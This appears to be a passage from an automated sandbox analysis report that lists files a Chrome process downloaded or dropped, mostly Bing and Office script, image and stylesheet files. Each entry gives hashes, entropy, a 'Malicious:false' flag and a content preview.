                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:53:43....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................._..Z/9.....AhY...T0*!Eu,..dk.....y. .LP.B..V..m@@f....<uf.......h...)8.2j..*U...<.n....4.B.-....W..^.J..o.{.....z.....".s.,.S...;...^f<.O8,>u.s...n.)....\o..6.{.=#:(.F.;..;1].V.........U5.1..W..g7|r5..==...Hy..h....@...KV.{.l.9.........F.S....N{9.Y..(C.f..u\..&OX..-..N..w\..(.:.1..:ldGW.q.!...mo...e.=........a2..:hkA.....Z.:r}.....Z[...../\...-..A.#..E-K.5..k........]....yQhiAF........cy.[...C..qg.j.Y..Q3.Uh(..X.>kjs..5.....=.M.J.m.Q...FE.m=s..>.WSv..J..42+....V..[....n,.h..5...\.I]...%T.0k.=...h..5.td....].@.\..^.r....d.f..[....k....0*E.U..H.....G...]]Z.M.Y..-..I....%.......................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (902), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):902
                                                                                                    Entropy (8bit):5.200751776659475
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Hl7/nJ4aZUv+MW/sRdrwq50n+pM12vk1Q4W3Idc4Wn:d/Caq+M93H5kOaC3Idmn
                                                                                                    MD5:76ED74A9FD9A74443976389C069CC74A
                                                                                                    SHA1:03AE45E49077B7D87D7FCC434574BA49F95664E3
                                                                                                    SHA-256:B443A3D58AEC4919E37DF4629F8C759A43091B1F63B5A815F8052DF0D8D46804
                                                                                                    SHA-512:D2D13DA2F47C2E94DB3A3B9B6F5185C8352268B1D336BAAA856177BE4B098535BD71BC53819FC73C0F4970DABCB7ECC7F375B4DEB1C25B25474551204B6921F4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/A65F5JB3t9h9f8xDRXS6SflWZOM.js
                                                                                                    Preview:var HeaderPlusAlgo_Selector;(function(n){function e(n){for(var u,l,h,e=[],c=t(sj_b.querySelectorAll(f+(n?", :focus":""))),s=0;s<c.length;s++)u=c[s],u.className.indexOf("b_ans")!=-1||u.id=="b_pole"?(l=t(u.querySelectorAll(r)),l.length==0&&(h=o(u),h&&e.push(h))):i(u)||e.push(u);return e}function t(n){for(var i=[],t=0;t<n.length;t++)i.push(n[t]);return i}function i(n){if(n){var t=window.getComputedStyle(n);return t&&t.display=="none"?!0:i(n.parentElement)}return!1}function o(n){for(var r,e=t(n.querySelectorAll(u)),f=0;f<e.length;f++)if(r=e[f],!i(r)&&r.tabIndex!=-1)return r;return null}var r="#b_results h2 a,#b_results h3 a,#b_results h4 a",u="input, select, textarea,a[href],*[tabindex = '0']",f=r+",#b_results .b_ans,#b_content #b_pole,#b_content #b_topw";n.getSelectableElements=e})(HeaderPlusAlgo_Selector||(HeaderPlusAlgo_Selector={}));NavSelector=HeaderPlusAlgo_Selector.getSelectableElements
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1037 x 807, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):454211
                                                                                                    Entropy (8bit):7.990991479839813
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:2YIEcwyZJePwC+T+nOpGqxWwuoyTvtkz124TdyKd:5TqDBBAUEY1HHd
                                                                                                    MD5:40F76B47F614919A109A3E36E611B55F
                                                                                                    SHA1:161E1B199DA787D63485E2C0D0B2EAFCAF0A60E8
                                                                                                    SHA-256:0577A7A47D06A9385C6BF2A52E5B5646B73B2A331B31F016EEADC7308370F753
                                                                                                    SHA-512:98F92FAF568AA1F03B8DDD4493DA52E8B095FA3AB518F0B6A606CD423A12D8AB51AA9453211CF10844787A1BFC146E3485A1CF940FB7D73C63B71CC2130B79C5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR.......'.....U.3....pHYs.........&.:4....sRGB.........gAMA......a.....IDATx.....$.u......u.k;.=..0.o...h."..Q\R|Z..R.....{.....Oz..J+i..OK.2.$..H..a......7......[.*.s"#+23..n.@"....[...ddVu..9q.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[...........V.U......APZ.k....G.d.0..6.Agc8(v..Zg......g.x:."...............;.N4........}.k7..q.......|.Z./....`6.E.....E.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1067 x 742, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):571791
                                                                                                    Entropy (8bit):7.997310243142735
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:GQEnGqYKJ83t1x9Y9c9YA6P/WVzSF3rbuQdzQHULLq:NEnxlJ89LL9YAcoG5H8mq
                                                                                                    MD5:27F24F9CACA928D2DD0AA2192FF055EA
                                                                                                    SHA1:EFE1BE378E1F124A5F4529FFD45F18CB2E3434D4
                                                                                                    SHA-256:47DC43974FD21405DAE835D7A87429F90F3028EE9726A96ECA0F80CD765E22F4
                                                                                                    SHA-512:2121BC94FBD792D9D388480CC75B3A6375E2DDAF3A6C6EE6DC7A4934DF1187EAEBCC71481E526D7EF5912A7F10B711B13D72AD5468F825EB331FEC1DB038B55A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-edu-1-mreb-27f24f9cac.png
                                                                                                    Preview:.PNG........IHDR...+.........km......pHYs.........&.:4....sRGB.........gAMA......a....$IDATx.....n.U.....w.7.<f"....BP0..P.dj!.....A..n.m4.W.o..n..E.li..DD.a.!..B..2..y.J........o.u.{.W..j..[...;g.k....6Q".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1039), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1039
                                                                                                    Entropy (8bit):5.394520629964255
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:AaV1T141S2BjoljiHXdX4daXOcRWOkDqBlg:AK41PjEjiHKKwOjXg
                                                                                                    MD5:16050BAAF39976A33AC9F854D5EFDB32
                                                                                                    SHA1:94725020EFA7D3EE8FAED2B7DFFC5A4106363B5E
                                                                                                    SHA-256:039E6B3DF1D67341FB8E4A3815F0D1BB3292A2040334CEB9CFC4A8D6ABF2FB55
                                                                                                    SHA-512:CF0D54F0368FFBC6908216FD2573DF8F5FE4C34AC08E17301B8734B3FABC674672A7F456707F632F82F44B36812DAD8A0CF81A51D5CEA21EA7F0E18500298375
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var UetTag;(function(n){function t(n,t,i,r,u){var e,o,h,s,v,f,c;i===void 0&&(i="script");r===void 0&&(r="//bat.bing.com/bat.js");u===void 0&&(u="uetq");var y=n.location.search.substring(1),l=y.split("&"),a="";for(e=0;e<l.length;e++)if(o=l[e].split("="),o.length>=2&&o[0]==="form"){a=o[1];break}for(h=["MSC001","MSC002","MSC003","MSC005","MSC006","MSC007","MSC008","MSC009","MSC010","MSC011","MSC012","MSC013","MSC014","MSC015","MSC016","MSC017","MSC018","MSC019","MSC020","SP0001","SP0002","MOG001","MOG002","MOG003","MOG004","MOG005","MOG006","MOG007","MOG008","MOG009","MOG010"],s=0;s<h.length;s++)if(h[s]===a){n[u]=n[u]||[];v=function(){var t={ti:"355015334",q:null};t.q=n[u];n.UET&&(n[u]=new n.UET(t)||[]);n[u].push("pageLoad")};f=t.createElement(i);f.src=r;f.async=1;f.onload=f.onreadystatechange=function(){var n=this.readyState;n&&n!=="loaded"&&n!=="complete"||(v(),f.onload=f.onreadystatechange=null)};c=t.getElementsByTagName(i)[0];c.parentNode.insertBefore(f,c);break}}n.uetTaggingInit=t;t(
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (902), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):902
                                                                                                    Entropy (8bit):5.200751776659475
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Hl7/nJ4aZUv+MW/sRdrwq50n+pM12vk1Q4W3Idc4Wn:d/Caq+M93H5kOaC3Idmn
                                                                                                    MD5:76ED74A9FD9A74443976389C069CC74A
                                                                                                    SHA1:03AE45E49077B7D87D7FCC434574BA49F95664E3
                                                                                                    SHA-256:B443A3D58AEC4919E37DF4629F8C759A43091B1F63B5A815F8052DF0D8D46804
                                                                                                    SHA-512:D2D13DA2F47C2E94DB3A3B9B6F5185C8352268B1D336BAAA856177BE4B098535BD71BC53819FC73C0F4970DABCB7ECC7F375B4DEB1C25B25474551204B6921F4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var HeaderPlusAlgo_Selector;(function(n){function e(n){for(var u,l,h,e=[],c=t(sj_b.querySelectorAll(f+(n?", :focus":""))),s=0;s<c.length;s++)u=c[s],u.className.indexOf("b_ans")!=-1||u.id=="b_pole"?(l=t(u.querySelectorAll(r)),l.length==0&&(h=o(u),h&&e.push(h))):i(u)||e.push(u);return e}function t(n){for(var i=[],t=0;t<n.length;t++)i.push(n[t]);return i}function i(n){if(n){var t=window.getComputedStyle(n);return t&&t.display=="none"?!0:i(n.parentElement)}return!1}function o(n){for(var r,e=t(n.querySelectorAll(u)),f=0;f<e.length;f++)if(r=e[f],!i(r)&&r.tabIndex!=-1)return r;return null}var r="#b_results h2 a,#b_results h3 a,#b_results h4 a",u="input, select, textarea,a[href],*[tabindex = '0']",f=r+",#b_results .b_ans,#b_content #b_pole,#b_content #b_topw";n.getSelectableElements=e})(HeaderPlusAlgo_Selector||(HeaderPlusAlgo_Selector={}));NavSelector=HeaderPlusAlgo_Selector.getSelectableElements
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (7155), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):7155
                                                                                                    Entropy (8bit):5.435598317550486
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:paWT3REjhNn5y1Myoy+y25syZWNKo5xp5VUILj/rVEkVu4akUr:paWzEhNn5y1Myoy+y25syq/VUIX/1aka
                                                                                                    MD5:DC221228E109F89B8B10C48F2678FB46
                                                                                                    SHA1:1BFC85CBA5C424136941AC1DFD779A563B5BEED4
                                                                                                    SHA-256:F4FB7234959F48C2B2CA73FD6C35D36EAF65D8C431D982A1BA208F5CDC766419
                                                                                                    SHA-512:46F49E5AC18436251778D1F50C027729A2442ED6541C3162D878720703E37797B6028D96EB1568C23EC5006FB022C8E05855E250D6A1A590F41E890866529CD2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/G_yFy6XEJBNpQawd_XeaVjtb7tQ.js
                                                                                                    Preview:var QuickSearch;(function(n){function et(n){var t=_w.location.protocol+"//"+_w.location.hostname+"/chat?q="+encodeURIComponent(n)+"&showconv=1&sendquery=1&form=IPRV10";a?window.open(t):_w.location.href=t}function w(n){sb_st(function(){var it,rt,ut,ft,f,a,w,st,d,at,s,v,g,vt,ht,y,p,ct,nt;if(l=null,NodeList.prototype.forEach||(NodeList.prototype.forEach=function(n,t){t=t||window;for(var i=0;i<this.length;i++)n.call(t,this[i],i,this)}),f=window.getSelection(),t=(it=f===null||f===void 0?void 0:f.toString())!==null&&it!==void 0?it:"",a=_ge("qs_searchBox"),w=o?_ge("mfa_root"):null,!o||w!=null){var lt,et=!0;f!=null&&f.anchorNode!=null&&(lt=f.anchorNode.nodeValue||f.anchorNode.textContent,et=!tt.some(function(n){return n!=null&&n!=undefined?n.contains(f.anchorNode):!1}),f.anchorNode.childNodes!=null&&f.anchorNode.childNodes.forEach(function(n){(n.nodeName==="INPUT"||n.nodeName==="TEXTAREA")&&(et=!1)}));st=!0;dt()||f.type=="Range"||(st=!1);t.trim()!=""&&et&&st&&u&&t.trim().length<2048?(sj_log("C
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (4315), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):4315
                                                                                                    Entropy (8bit):5.385732711634534
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:LdH7YGUdnsDWnUR87oc5GIsLAqZUGmnxttvmBvsSGydxyO9rpn:Ld/U6SnUK7T5/gpZUGmxLvmB0SGydxy4
                                                                                                    MD5:B0AA9CA5704348C1B9B358F4B645BB99
                                                                                                    SHA1:D97774355811D2FEC080434B0E5D3B301051F0D0
                                                                                                    SHA-256:EEC8F864735CC255153EB3B5666A0AC7E30DD9CCEE5643ADF111AF8F4D5C488F
                                                                                                    SHA-512:9C697D00FE1C5F97196CE031A451FB6444E3189C23BE3BA7A1F9E8F0111361460366D9E415E1EFFE24325DF201AD1E7A59502785CFB93272BB4DAC6F2992FA5B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/2Xd0NVgR0v7AgENLDl07MBBR8NA.js
                                                                                                    Preview:var BrandingNav=function(){function n(n){this.render(n)}return n.prototype.startCarousel=function(n){var i=document.getElementsByClassName("nav-item"),t=1,r;n.length>1&&(r=setInterval(function(){i[t].className="nav-item nav-item-fade-out";t=(t+1)%i.length;i[t].className="nav-item nav-item-fade-in"},8e3))},n.prototype.renderButton=function(n,t){var u=document.createElement("div"),i,r,f;return u.className="b_branding-nav-btn-container",i=document.createElement("div"),i.className="b_branding-nav-btn-text-container",i.innerText=t+": ",r=document.createElement("a"),f="www."+n,r.innerText=f,r.href="https://"+f,r.target="_blank",i.appendChild(r),sj_be(i,"click",function(n){n.preventDefault()}),u.appendChild(i),sj_be(u,"click",function(){_w.open("https://"+f,"_blank")}),u},n.prototype.renderIconButton=function(n){var t=document.createElement("div"),i;return t.className="b_branding-nav-icon-btn",t.innerHTML='<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/20
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (597), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):597
                                                                                                    Entropy (8bit):5.118419789099075
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:KwOdMnCT1Q5tnasxfd7hq6IJCxmLgIJC1XayS/Y:KwsK5tLxF7hq1CULvC1CY
                                                                                                    MD5:BC03BF3C5385FC8CAA0B78FF9F288571
                                                                                                    SHA1:BA6A9BB281DDB4E568F20D983FCDA004E35B0E2C
                                                                                                    SHA-256:3F1053FD0025539D86800D82479859A309B5F55F9D82AA6187845B0D9A89FC6A
                                                                                                    SHA-512:EC7BB3480EB42B8A9864D6256817B15B4596CD258F984DB0142715398FF994E1376E2AE0C494967BE76A61CDF6FE3809D843E3179A514CB651BBFD5EA90DAD98
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/umqbsoHdtOVo8g2YP82gBONbDiw.js
                                                                                                    Preview:var NewsAnswerBigLogoScroll;(function(){"use strict";function t(){var t,i;if(n(),"MutationObserver"in window){if(t=_qs(".ans_nws"),!t)return;i=new MutationObserver(function(){n()});i.observe(t,{childList:!0,subtree:!0})}}function n(){for(var r=_d.querySelectorAll(".big_pub_logo"),e=r.length,t=0;t<e;t++){var n=r[t],i=n.querySelector("cite"),u=n===null||n===void 0?void 0:n.getBoundingClientRect().width,f=i===null||i===void 0?void 0:i.getBoundingClientRect().width;u&&f&&f>u&&!n.classList.contains("scroll")&&n.classList.add("scroll")}}t()})(NewsAnswerBigLogoScroll||(NewsAnswerBigLogoScroll={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 2501 x 832, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1771981
                                                                                                    Entropy (8bit):7.988247142332494
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:4uB7Y0eaS7xe+q6frEduiPaUU48p5fUxGVPaUZUq:bVeaSdPfmtPhU48p54qaUZ3
                                                                                                    MD5:0E10BF7B4FD04ED50A4073604A728FEF
                                                                                                    SHA1:7773AC6F48BD27CED0F82FD58A45F2C923EF87A4
                                                                                                    SHA-256:361AF6EA15689C97588C78A27C25C38C789D9E68B9400AD48B114B05FC285662
                                                                                                    SHA-512:82430B2B1C62635B876CF652FC160F295AB9AEF84D65F310C71BBCD0D44EC6359AFC4FEB70E58CCC8A19F21A2FE2C292F9FF79887C4A17532D21D2835E1624B2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR.......@.............pHYs.................sRGB.........gAMA......a....bIDATx....,[~...Z.Y...>..{..#Z...DJ....)..MQB........;.a.../..~..~.-.!*.pX. C...e..Hq....F..{...U.ki....2.j..$..8.~...UY.+W....:...s.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (5738), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5738
                                                                                                    Entropy (8bit):5.114371070471245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:xYLyztiz5XwxTbVvI2NxsHQH56PkYveiekeBekebVejeIIvAybIgE3UyfI0syxHz:2z5gxTdNxsHQH568YveiekeBeke5ejeY
                                                                                                    MD5:2937C6DCAD55E5E4A67945F4F803C7CD
                                                                                                    SHA1:27399487B23109021F178841013D476F92B057C6
                                                                                                    SHA-256:ACB0819704DDC4062D6A3B565BA7FE999FEF298778B4B56C284E8F1BEBF3C9B7
                                                                                                    SHA-512:2C07163F841A09D2061AF35C7183984475247CE50A9000B4B2B0B5240701A64B140ECA99853238DB08BB94E9B9368BDFFFE9E83185EDA1745FB02E6F81110D3A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var Chevrons;(function(n){function s(){f=null;t=null;e=!1;o=!1}function a(n,t,i,r,u,f){var e,o=function(n,t,i,r,f){return new l(n,t,i,r,u,f)};typeof SmartRendering!="undefined"?SmartRendering.LoadElementWhenDisplayed(this,_ge(n),o,[n,t,i,r]):o.apply(this,[n,t,i,r,f]);(e=window.ChevronsPoleWheel||window.ChevronsPoleWheelCF)===null||e===void 0?void 0:e.init({container:_ge(n),btnPrev:t,btnNext:i})}var i="disabled",h="hidden",r="darkchv",u="exp",c="expd",t=null,f=null,e=!1,o=!1,l=function(){function n(n,t,i,r,f,e){var o=this;this.controlId=n;this.prevSlideBtn=t;this.nextSlideBtn=i;this.tabbable=r;this.enableGradientDisappear=f;this.nextChevronOverlay=_ge(e+"_chevron_overlay_next");this.prevChevronOverlay=_ge(e+"_chevron_overlay_prev");this.onPrevClick(function(){var n="slideexp_slideprev",t="Prev",i=Lib.CssClass.contains(o.prevSlideBtn,u);i&&(Lib.CssClass.remove(o.prevSlideBtn,u),Lib.CssClass.add(o.prevSlideBtn,c),n="slideexp_expandleft",t="ExpandLeft");sj_evt.fire(n,o.controlId);Log.Log(t
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):209
                                                                                                    Entropy (8bit):6.257245349235395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPl3xWrE9/gnbBE1d7snLQNylzkIgDhqo/1ir1216rTmVN80S+st2up:6v/lhPKwCnFGgQNyld+/ou6Hp0NsTp
                                                                                                    MD5:7D4555B1487EC50930C7567B2690BF10
                                                                                                    SHA1:544C4B9A47D0D12FD38FDC07900D32D31C0F600F
                                                                                                    SHA-256:50BBDF35A7DE6804B4E50971D7E3656D6C8100E4A03CF935F841D0AFD47D8371
                                                                                                    SHA-512:F293E1F06C7244C2FD080A65C3A32D134A6AF23E9148B8A391E242D8EA36297FFE8C500903B9B65A6E450EB1731ECF28CBE0A67F6E246938501BEBDDA5A6B177
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....sIDATXG....0...7...#.}$.....N..bu...,.....>>.mm....8....K....@....NW..n......cL..7....0....\...v.k.. ......`x....GT..{....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 60 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1045
                                                                                                    Entropy (8bit):7.812007487462295
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2YvL3J/eQWCXbwIoGryAFXt3jwRDa9W3TH:Rv1NHUIbrzU3TH
                                                                                                    MD5:2AA8CAB3D7B05D1540A69E6DA11C916B
                                                                                                    SHA1:4F7B7A5776B3806E0195245C82E476B2CB943B14
                                                                                                    SHA-256:BE40B55ED2C02CA68A1527E8B50CB949FFF17EC444504F9ABCE98C97EBAD1738
                                                                                                    SHA-512:FEC6CD89DA1CC4630A229567101F83D979860F6CDF34FEA00174052FDEE93F00F8F0AA489C565F6CD1BCEE3124DFCB1DCE9418FBA7B3983EF6F6946C8689B241
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/rp/T3t6V3azgG4BlSRcguR2ssuUOxQ.png
                                                                                                    Preview:.PNG........IHDR...<.........=P.D....IDATx..?LSA.......J(......YcY\.......%&n.XD....X...N..Q...US.IL...z.?.?.}..I.......~w....Jv..Q..........8M...6..%..X.u....\.f.X..>u.d..E.+b6.P4.].........W.}t..jc......^.....p.).".U.H...y...i...Fz......a`.,Gr.8XP.K3@./.U...+........d`.;...,...{.U.s.:...<O......~..'.8#{...5....9...../."S.....9...Nr<=.u57.?G.a.x......}.....6n=W.3}...(.QV....y..R..G`.J...5....h.R.Z).:8.../5.%&..9..M...jQ.V?..[-E...........-....1.[!....)Ml].i.I. 8.).A.aiE./0.C'.P...v.....e(.....;...E...i..D....ea.#.3)..h..&,...Y..$-G......G...IY..T...mP.5?l...5w..t....m.O6........o(...f.k..Q5.....A.....S.......s.D..R.....^..{o..~..a...X....Z.I..Z.*/m...$....\..2O.$%.3;....)..m...}h.l....&.OPq.k......T.:q.E.p"".....{V.$/4a9.G.4.E..1..{... Y.....:3.9.&m..Z...k.'........v.\.e...y+.L..%..{..8..E..R&....[I.P......0.u/#.......f......e....H'.v..qp..J.w..}e.*.,..@....7Sjd.$aW......o.'R...L.#...0....K..rT`>>......Y2..,...!.......T
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):584
                                                                                                    Entropy (8bit):7.3756349937938515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iwkF9d1ZiK+j8toHwxtsjsXGDTygIk2KdC0sW8RuJbu1:HnAHQOTdIGdC0b8RuBu1
                                                                                                    MD5:46EE8FAD6E954D4C6869A9D912E54178
                                                                                                    SHA1:C75DEE3ABFB1E4A480667CF72B7CD6F794C2201A
                                                                                                    SHA-256:D997B0C72B7A2265D7A9B60C6D573EE17B51E17A1DF42FF3C295BABD9B28F6FA
                                                                                                    SHA-512:A64D949D3B9465F0C6D5CEAFD605B47A22AA8896C1855D7A756A17647328AA78E93E96DF7738E3388334B0F9C7DD951DDB3F6CBC5E20A5EC98D0708CBDA8C0E2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG..m.P.F...........2BV..L.{f..I{(.2...JZ...Q.6...r...|..d..\..a.V.....?, 2.....C@]..(............|.n..v.^.gk....[..S.......,.8....}..l..}xO0..6 ...g- ...nz/.P..cm.g...I.'6..*..m.6q.\..`7#.if.B.I...CH..*.U...?.}[.~Q... ..e.@.v`=..-....f......|#?.ld.P....e.V.e..RVI....)@.;.L.3.=;....`!B..Q...CXv.D*.tCF.$P.#...F.X.....0.d...Hk..l.E...[f.S..+ ..H....)....S..G.+....gS...1.....sm...v4-....|....X....%@.-.....]<.]....yv3.-..1.=b...@+.....|.n.G.....H+r8.1.rE....f\......p/......IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1644), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1644
                                                                                                    Entropy (8bit):4.899610368751396
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:s9bhidevShPUdD1h+E+K6d/9SNSLSwdFe86:s9bhMVhP+D1h+E+KEFcixFe86
                                                                                                    MD5:F7F2466FF5C73AE1AB3C664E0B8F3244
                                                                                                    SHA1:2CA515E0E559371ADD59EB88C2F9EE5F55B6896B
                                                                                                    SHA-256:452C71710AC8407DA431E133ED831FE09C6C881F23E9B0E93192FD8DC8BAB71F
                                                                                                    SHA-512:C29B38F27FB12C019D6044C56837553C660843F7436210F96099D2AD74ACC1E97BDADAE75A4C5ABF31F71A90CB3FD43A5E395763070B106AE36055186B7D1D88
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/bundles/sharedfontstyles-f7f2466ff5.css
                                                                                                    Preview:@font-face{font-family:SegoeUI-Light;font-display:swap;src:local('Segoe UI Light'),local('SegoeUI-Light'),local('Segoe WP Light'),url(../versionless/webfonts/segoeui_light.woff2) format('woff2'),url(../versionless/webfonts/segoeui_light.woff) format('woff'),url(../versionless/webfonts/segoeui_light.ttf) format('truetype')}@font-face{font-family:SegoeUI-SemiLight;font-display:swap;src:local('Segoe UI Semilight'),local('SegoeUI-Semilight'),local('Segoe WP Semilight'),url(../versionless/webfonts/segoeui_semilight.woff2) format('woff2'),url(../versionless/webfonts/segoeui_semilight.woff) format('woff'),url(../versionless/webfonts/segoeui_semilight.ttf) format('truetype')}@font-face{font-family:SegoeUI;font-display:swap;src:local('Segoe UI'),local('SegoeUI'),local('Segoe WP'),url(../versionless/webfonts/segoeui_regular.woff2) format('woff2'),url(../versionless/webfonts/segoeui_regular.woff) format('woff'),url(../versionless/webfonts/segoeui_regular.ttf) format('truetype')}@font-face{font-fa
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (2014), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):2016
                                                                                                    Entropy (8bit):5.3161096027675105
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:bnXL8sjfZ/Fslrgj3rzIRlK0KqoLi7XSOLFTt+jCz1T9XNZTs3Gan/An0:bnoshqlMQRlZTolKOEXNZsWan/An0
                                                                                                    MD5:D807DBBB6EE3A78027DC7075E0B593FF
                                                                                                    SHA1:27109CD41F6B1F2084C81B5D375EA811E51AC567
                                                                                                    SHA-256:0ACDCE370092C141B0C6617ED6E2163F04BB9B93D3213B62C2BC7A46FE0243C7
                                                                                                    SHA-512:E037DFC31D595B459660FE7D938EEDB4F43D208D247174EE8D6FD0D125F211142CD73497E4601893CECB6F565B7E2E7815CE416D72BB95504D3F277E4E806D11
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/JxCc1B9rHyCEyBtdN16oEeUaxWc.js
